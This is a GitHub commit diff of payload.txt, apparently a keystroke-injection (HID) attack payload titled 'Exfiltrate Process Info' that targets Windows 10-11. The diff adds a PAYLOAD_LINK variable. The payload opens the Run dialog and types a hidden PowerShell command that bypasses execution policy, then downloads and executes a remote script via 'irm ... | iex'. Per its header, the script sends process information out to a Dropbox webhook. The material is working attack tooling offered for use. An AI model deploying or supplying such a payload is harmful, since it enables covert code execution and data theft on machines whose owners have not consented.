Update payload.txt

pull/608/head
Aleff 2024-06-10 09:07:00 +02:00 committed by GitHub
parent 89bd009f2b
commit 3e33747b6c
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 18 additions and 15 deletions

View File

@ -1,23 +1,26 @@
* ##########################################
* # |
* # Title : Exfiltrate Process Info |
* # Author : Aleff |
* # Version : 1.0 |
* # Category : Exfiltration |
* # Target : Windows 10-11 |
* # |
* ##########################################
##########################################
# #
# Title : Exfiltrate Process Info #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration #
# Target : Windows 10-11 #
# #
##########################################
* Requirements:
* - Internet Connection
* - Dropbox Webhook
ATTACKMODE HID
# Requirements:
# - Internet Connection
# - Dropbox Webhook
# VARIABLES:
# - Reply example.com with your own link. The Payload should be ExfiltrateProcessInfo.ps1
PAYLOAD_LINK='example.com'
QUACK DELAY 2000
QUACK GUI r
QUACK DELAY 250
QUACK DELETE
* REQUIRED - Reply example.com with YOUR LINK. The Payload should be ExfiltrateProcessInfo.ps1
QUACK STRING powershell -w h -ep bypass irm PAYLOAD | iex
QUACK STRING powershell -w h -ep bypass irm $PAYLOAD_LINK | iex
QUACK ENTER